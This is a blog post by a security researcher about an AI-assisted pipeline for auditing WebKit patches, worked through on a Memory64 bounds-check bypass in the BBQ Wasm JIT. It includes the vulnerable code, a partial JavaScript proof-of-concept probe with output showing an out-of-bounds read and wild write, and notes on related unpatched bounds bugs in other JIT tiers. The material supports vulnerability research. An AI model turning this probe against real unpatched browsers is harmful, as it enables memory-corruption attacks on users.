How I Audit Security Patches with an AI Pipeline
Posted on Sat 02 May 2026 in Thought, AI, Security Research
Most security patch auditing tools look for known vulnerability patterns. They diff a commit, grep for dangerous functions, maybe flag things that look like what last year's CVEs looked like. That works for the obvious stuff. It doesn't work for the commit that says "no behavior change" and silently fixes a bounds check bypass in a JIT compiler.
That's the commit you actually want to find.
The Problem with Summarizing Diffs
The instinct when you have an LLM is to ask it to summarize the patch. "What does this fix?" You get a paragraph that tells you what the code does, which you mostly already knew from the commit message. What you don't get is the adversarial question: what did the pre-fix code allow that the post-fix code doesn't, and can an attacker still reach that state through a path the fix didn't touch?
Those are different questions. Summarization answers the first one poorly and ignores the second entirely.
The thing that changed how I thought about this was forcing every analysis to start from a falsifiable hypothesis instead of a description.
SOUNDNESS_CLAIMS: Adversarial Hypotheses, Not Observations
Instead of asking "what does this patch do," I ask the analysis agent to produce what I call SOUNDNESS_CLAIMS. Each claim has a specific shape:
- F(x): The attacker's trigger - what JS/Wasm/HTML the attacker sends
- P(x-pre): What the pre-fix code does with it - the vulnerable state reached
- prefixfailure: The specific failure mode - what crashes, leaks, or gets corrupted
- postfixstatus: What the fix actually blocks - which line, which check
The prefixfailure field is the part that matters. It forces you to name the specific bad outcome before you look at whether the fix prevents it. If you can't name a concrete failure mode, you don't actually understand the bug yet.
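As a sketch, that forcing function can be made mechanical. The field names below come from the schema; the constructor and the vagueness check are illustrative, not the pipeline's actual code:

```javascript
// Illustrative SOUNDNESS_CLAIM constructor - field names from the schema,
// validation logic is a hypothetical sketch of the forcing function.
function makeClaim({ fx, pxPre, prefixfailure, postfixstatus }) {
  // prefixfailure must name a concrete bad outcome, not a possibility.
  const vague = /\b(might|could|maybe|potentially|possibly)\b/i;
  if (!prefixfailure || vague.test(prefixfailure)) {
    throw new Error("prefixfailure must name a concrete failure mode");
  }
  return {
    fx,            // attacker's trigger input
    pxPre,         // vulnerable pre-fix state reached
    prefixfailure, // named bad outcome
    postfixstatus: postfixstatus ?? "To be confirmed empirically",
  };
}
```

A claim whose prefixfailure reads "might be exploitable" fails construction; "OOB read of mem[0] without a trap" passes.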
Here's what that looks like on a real commit.
The Commit
d8a913bd3fe - WebKit, April 2026. Commit message: "Fix Memory64 overflow checks in BBQ." It looks like a correctness fix in the Wasm JIT.
The relevant code change, in WasmBBQJIT64.h:
// Pre-fix
if (m_info.memory(memoryIndex).isMemory64() && boundary) {
    // branchAddPtr — overflow check before bounds comparison
}
zeroExtend32ToWord(pointer, wasmScratchGPR); // silent truncation

// Post-fix
if (m_info.memory(memoryIndex).isMemory64()) {
    if (boundary) {
        // branchAddPtr — overflow check
    }
    // ... preserves full i64 pointer
}
One guard clause is the difference: && boundary on the overflow check. When boundary == 0 - which happens for every 1-byte operation with no offset (i32.load8_s, i32.load8_u, i32.store8) - the overflow check is skipped entirely. The code falls through to zeroExtend32ToWord(), which silently discards the upper 32 bits of a 64-bit address.
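The truncation itself is ordinary bit arithmetic. A standalone sketch (variable names mine) of what discarding the upper 32 bits does to the attacker's address:

```javascript
// What zeroExtend32ToWord() amounts to on the skipped path: keep only the low 32 bits.
const addr = 0x100000000n;            // attacker's address: bit 32 set, low 32 bits all zero
const truncated = addr & 0xFFFFFFFFn; // upper 32 bits discarded
console.log(truncated);               // 0n - the access lands at mem[0] instead of trapping
```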
The SOUNDNESS_CLAIM from steps 1-2 for this commit:
F(x): Wasm Memory64 module, i32.load8_s at address 0x100000000n (bit 32 set)
P(x-pre): BBQ JIT compiles the load, boundary = 1 + 0 - 1 = 0, isMemory64() && boundary
evaluates false, overflow check skipped, zeroExtend32ToWord() truncates address
to 0x00000000, load silently reads mem[0] instead of trapping
prefixfailure: OOB read - attacker reads memory[0] without OutOfBoundsMemoryAccess trap;
for i32.store8 at 0x100000000n: wild write outside Wasm sandbox (ASan BUS crash)
postfixstatus: To be confirmed by step3 empirically
That last line is important. "To be confirmed empirically" is not a hedge - it's the contract. Source analysis of the pre-fix code is not proof. The binary might differ from the source. The code path might not be taken. You need runtime evidence.
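The boundary arithmetic in the claim is easy to check in isolation. A toy model of the guard (not WebKit code) shows which access shapes skip the overflow check:

```javascript
// Toy model of the pre-fix guard: boundary = accessSize + offset - 1,
// and `isMemory64() && boundary` skips the overflow check when boundary is 0.
function overflowCheckRuns(accessSize, offset) {
  const boundary = accessSize + offset - 1;
  return boundary !== 0;
}
console.log(overflowCheckRuns(1, 0)); // false - i32.load8_s / i32.store8, no offset: check skipped
console.log(overflowCheckRuns(4, 0)); // true  - 4-byte i32.load, boundary = 3: check runs
console.log(overflowCheckRuns(1, 8)); // true  - 1-byte access with offset 8: check runs
```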
Proving It at Runtime
The attacker agent's job is not to verify the fix works. Its job is to try to break it. Every output has to read like a failed exploit attempt, not a code review.
For this bug, the probe:
// Run: jsc --useWasmMemory64=true poc.js
// Expected: BYPASS for i32.load8_s and i32.load8_u
// ASan BUS crash for i32.store8
const bytes = buildLoad8Module(0x2c, 0x7f); // i32.load8_s, i32 result
const mod = new WebAssembly.Module(bytes);
const inst = new WebAssembly.Instance(mod, {});
// Warm up BBQ compilation
for (let i = 0; i < 10_000; i++) inst.exports.probe(0n);
// Trigger with address 0x100000000n - bit 32 set, should be OOB on a 1-page Memory64
const result = inst.exports.probe(0x100000000n);
if (result !== undefined) print(`BYPASS [i32.load8_s]: ${result}`);
Output on the pre-fix binary:
BYPASS [i32.load8_s]: 0
BYPASS [i32.load8_u]: 0
[ASan crash on i32.store8: BUS FAULT at 0x100000000]
SAFE [i64.load8_s]: OutOfBoundsMemoryAccess (different JIT path)
SAFE [i32.load (4-byte, boundary=3)]: OutOfBoundsMemoryAccess (branchAddPtr fires)
That's not source analysis. That's the bug firing in the binary. i32.load8_s and i32.load8_u silently read mem[0] instead of trapping. i32.store8 writes to 0x100000000 - a wild write outside the Wasm sandbox. The 4-byte load is fine because boundary = 3, the guard evaluates true, and the overflow check runs correctly.
The i64.load8_* safety is the interesting part - those take a separate JIT code path in BBQ that isn't affected by the same guard condition. That's exactly the kind of thing source analysis gets wrong. You'd look at the bug and assume all 8 load variants are affected. Two of the five variants you test turn out to be safe. Runtime proof catches what reasoning misses.
LLVM Coverage as Feedback
There's a third tool beyond the crash probe and disassembly: LLVM instrumented coverage. After a probe run, you can ask which lines were actually executed and which branches were taken. This matters when the probe exits cleanly - you need to confirm whether that's because the fix blocked the attack, or because the probe never reached the patched code at all.
For a NO_BYPASS verdict to mean anything, the patched decision point has to show up as HIT in the coverage output. A probe that produces a clean exit but never executes the guard it's supposedly testing is just a broken test. The coverage pass catches that before you draw the wrong conclusion.
In practice this looks like:
=== COVERAGE DELTA ===
WasmBBQJIT64.h:113 HIT (10003 calls) # isMemory64() branch entered
WasmBBQJIT64.h:114 HIT (10003 calls) # boundary check evaluated
WasmBBQJIT64.h:116 HIT (3 calls) # branchAddPtr executed (boundary > 0 cases)
WasmBBQJIT64.h:113 HIT # zeroExtend32ToWord() reached (pre-fix: all cases)
ASan tells you the symptom. Disassembly shows you the instruction sequence. Coverage tells you which branch was actually taken on the path your probe exercised. Together they close the loop - you know what happened at runtime, not just what the source implies should have happened.
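A minimal gate over that coverage output might look like the following sketch - the line format and the verdict names are my assumptions, not the pipeline's real interface:

```javascript
// Hypothetical verdict gate: NO_BYPASS is only allowed when every patched
// guard line shows up as HIT in the coverage output.
function gateVerdict(coverageText, requiredLines, probeExitedCleanly) {
  const hit = new Set();
  for (const line of coverageText.split("\n")) {
    const m = line.match(/^(\S+):(\d+)\s+HIT/); // e.g. "WasmBBQJIT64.h:113 HIT (10003 calls)"
    if (m) hit.add(`${m[1]}:${m[2]}`);
  }
  if (!probeExitedCleanly) return "BYPASS_OR_CRASH";
  const reachedGuard = requiredLines.every((l) => hit.has(l));
  return reachedGuard ? "NO_BYPASS" : "INCONCLUSIVE_PROBE_MISSED_GUARD";
}
```

A clean exit with the guard line missing from coverage downgrades the verdict instead of passing it.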
The Adjacent Unpatched Question
Every analysis ends with the same question: is this the only place this pattern exists?
For this bug, the adjacent search found that BBQ was patched but two other JIT tiers had related issues:
- OMG (WasmOMGIRGenerator.cpp): used B3::Above instead of B3::AboveEqual in the multi-memory bounds check - a 1-byte off-by-one that allows an access when addr + size - 1 == memorySize exactly
- IPInt (InPlaceInterpreter64.asm): the .memoryIsNotZero path compared wasmAddrReg against memorySize directly, without adding size - 1, allowing up to 7-byte OOB reads/writes on 64-bit loads
These were in separate commits. The BBQ fix didn't touch them. An audit that stopped at "BBQ is patched" would have missed both.
Then It Got Patched Without Me
Three days after I completed this analysis - April 22nd - a new WebKit commit landed: Cole Carley, "Memory64 atomic operations." It added Memory64 support for atomic ops in BBQ and, as a side effect of restructuring the same code path, fixed the boundary zero bug. The && boundary guard was gone. The fix I had just been analyzing was now in the repository.
I didn't report it. I wasn't planning to - this was research, not a disclosure. But watching the commit land independently a few days later was its own kind of signal. Someone else hit the same code path while building something new, noticed the guard condition was wrong, and fixed it. The pipeline found it first.
That doesn't make it a CVE or a disclosure or anything other than what it was: a bounds check bypass that existed in a flag-gated experimental feature, confirmed with a working exploit, scored, and then independently patched. The pipeline's job was to find it and understand it. It did.
What This Schema Actually Does
The value isn't the agent. The value is the forcing function.
Before I had this methodology, my patch auditing was inconsistent. I'd read interesting commits carefully and skim the ones that looked boring. I'd notice patterns in the ones I cared about and miss them in the ones I didn't. The pipeline forces the same quality bar on every commit that comes through. A SaferCPP housekeeping fix gets the same adversarial framing as a JIT bounds check change. Most of them close quickly at 1/10. But the 5s and 7s that surface do so because the process didn't let me stop at "looks fine."
The other thing it changed is my own ability to spot patterns. Running hundreds of commits through this framing - what's the trigger, what's the pre-fix outcome, where does the fix actually block it - builds a mental model that's different from reading CVE writeups. CVE writeups show you the polished version. The pipeline shows you the commit before anyone is sure it's interesting, and forces you to decide.
When you require prefixfailure to be a named concrete outcome before you look at the fix, you can't pattern-match your way to "looks good." You have to know what bad looks like for this specific bug, then verify the fix prevents it. That's the thing worth taking from this regardless of whether you use an agent or do it manually.
The schema spec is here. It's short - the field definitions, one worked example, and notes on what empirical proof means for different bug classes. If you're building something similar or want to adapt the format, that's the doc to start from.
If you want to compare notes, feel free to reach out.